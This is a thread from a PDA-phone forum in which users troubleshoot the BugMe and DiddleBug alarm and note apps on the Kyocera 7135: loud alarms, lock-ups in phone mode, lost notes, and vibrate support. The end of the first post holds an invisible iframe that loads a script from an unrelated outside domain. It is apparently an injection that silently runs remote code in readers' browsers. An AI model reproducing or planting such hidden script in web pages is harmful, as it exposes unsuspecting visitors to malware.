+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: BugMe alarms

BugMe alarms

I know some had listed that BugMe did not work with the 7135. It seems to work fine on mine with one exception. I have the alarm volume set to low in the pda gen prefs. But when a bugme alarm goes off, it is *very* loud (and quite annoying to those around me). For me, this makes the alarm useless. Anyone else using Bugme and find this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes, it is quite loud. I've stopped using it during the day. It is a great alarm clock . I had a system hang when the 7135 was in phone mode when the alarm went off. I leave it in Palm mode overnight.

real problem - be careful

Any have this happen to them - one a call and you use BugMe to jot down a note. Leaving BugMe open - you end the call. I go back to Bugme and the note I just wrote is replaced by a screenshot of the phone screen. I lost three important notes by not closing BugMe BEFORE I ended the call.

Anyone see this happen?

Yes- I lost an important note this way yesterday. I don't use the screenshot feature, so I ended up with simply a blank screen where there had been notes. BTW, I tried Diddlebug, which is very similar to Bugme, and it also has *very* loud alarm. It appears there may be some minor bug here related to alarms....

I had the same thing happen in Organized Ink! (A similar notepad program). Except that I wasn't sure why or how I found myself with a screeshot of the phone screen. Now I know!

Re: real problem - be careful

Originally posted by ozzir
    Any have this happen to them - one a call and you use BugMe to jot down a note. Leaving BugMe open - you end the call. I go back to Bugme and the note I just wrote is replaced by a screenshot of the phone screen. I lost three important notes by not closing BugMe BEFORE I ended the call.

Anyone see this happen?
    That appears to be an unintentional "feature".

Alarms in "Bugme" must be sound while in Palm mode. I just got another lock-up when an alarm went off when in phone mode.

Does the scratchpad like app that comes with the 7135 (I think it is in the Messages category) have the ability to do an alarm?
    If so, then we wouldn't need BugMe or another 3rd party app.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Does the scratchpad like app that comes with the 7135 (I think it is in the Messages category) have the ability to do an alarm?
    If so, then we wouldn't need BugMe or another 3rd party app.
    No. Unfortunatly, Kyo combine the palm Memos and Notepad applications into a single application along with Voice Memo, and did not include an alarm function. The other disappointment in this is that now the Notepad doodles do not synch to the Palm Desktop. (they are backed up, and you can see that both they and the voice memo's exist because their titles will be in the memo pad list, but you can't view them on the PC).

Alan

I have now confirmed that the app Diddlebug, a freeware version of BugMe, does NOT have the problem of losing screens when going from the phone app. I am switching to Diddlebug, and changing the alarm for it to "bird", which although still too loud, is a very short chirp and not as obnoxious...

I read pdadoc's post and downloaded and installed DiddleBug. Although the interface looks similar to BugMe, I cannot get it to give me more than one screen. The alarm worked fine, but if I want to do another "diddle" I get 2/2 but the screen doesn't change. Is this a 7135 issue or am I missing something on the install. I have deleted and reinstalled it. The manual is essentially non-existent.

As I posted in another thread, when my BugMe alarms go off on my 7135, they are no louder than normal.
    ~'kito
    pdaPhoneHome Moderator

Dont most people complain that they can't hear thier palm alarms? LOL

Old Palm III alarms's couldn't even wake a person up!
    iPhone therefore iAm.

est8plannr- not sure what you mean. When you tap "new" in the menu, you don't get a new blank screen? Mine is working fine (have about 8 screens of writing)....

pdaDoc, that's exactly what (doesn't) happens. I just don't get a new screen at all. I am wondering if I installed correctly. It doesn't say anthing about hackmaster or anything (I have that installed). I just clicked the program button on my (Windows XP pro) computer and it put the .prc file in the installer. I synced and its on the 7135, but clearly not working as intended. BugMe works fine, but I am worried about the alarm conflict when the phone is on. Maybe I need to download it again and see if that solves it.

My suggestion would be to first delete it (using the standard application launcher, not third party). Then try downloading again (should be current version if from palmgear or their site) and reinstalling. Good luck!

Any interest in this for a solution???

My needs are simple. I want to be able to set one time alarms quickly and easily. I don't want any conflicts with the Phone application, and I want to use my MP3 alarm sounds. I don't
    t care about "doodles".

Before I purchased my 7135, I had bought NSBasic as a low cost way to get into Palm programming without learning C++. On their support forum is a sample program for adding appointments to the build in calendar application.

For my own use, I have modified this sample to insert a zero length appoinment, with an alarm and no advance time on the alarm. The default description is "Alarm", although the program allows for the description and note to be modified.

Although not particularly pretty yet, this works flawlessly on the 7135, and if anyone is interested in it, I would be happy to share it. PM me if interested. If I get a lot of responses, I'll post it to the files section and keep it updated as I add features or make the interface more attractive.

Alan

I didn't realize there was a newer version out. I had ver. 2.15 and have now downloaded ver. 2.55. I don't have my cradle (at work) so I'll try it Monday. The ver. 2.15 is apparently for an older Palm OS ver. I'l try it and see.

Re: BugMe alarms

Originally posted by pdadoc
    I know some had listed that BugMe did not work with the 7135. It seems to work fine on mine with one exception. I have the alarm volume set to low in the pda gen prefs. But when a bugme alarm goes off, it is *very* loud (and quite annoying to those around me). For me, this makes the alarm useless. Anyone else using Bugme and find this?
    Did you try changing the type of alarm? The bird chirping sound seems much less offensive.

That's exactly what I've been using- the chirp isn't bad. On another, but related note: I cannot figure out any way to get the vibrate to work with BugMe or Diddlebug. When I silence the phone (holding the down button on the side down), while Datebk5 alarms then vibrate, BugMe or Diddlebug alarms show up on the screen, but there is no auditory or vibrate alarm. If anyone knows how to get the vibrate alarm working, that would be great...

pdadoc: FYI, I solved my problem. I loaded the hack and then the new version of diddlebug and it works fine now. I set mine on "bird" also.

You probably already know this, but when you go to the alarm preferences, it says that the vibrate feature is not available. I assume this means it is simply not supported by the diddlebug and bugme programs. The diddlebug guy entertains requests. This probably one to make. I have had the 6035 and now the 7135 for a couple of years now and haven't had a "regular" Palm during that time. Do they vibrate??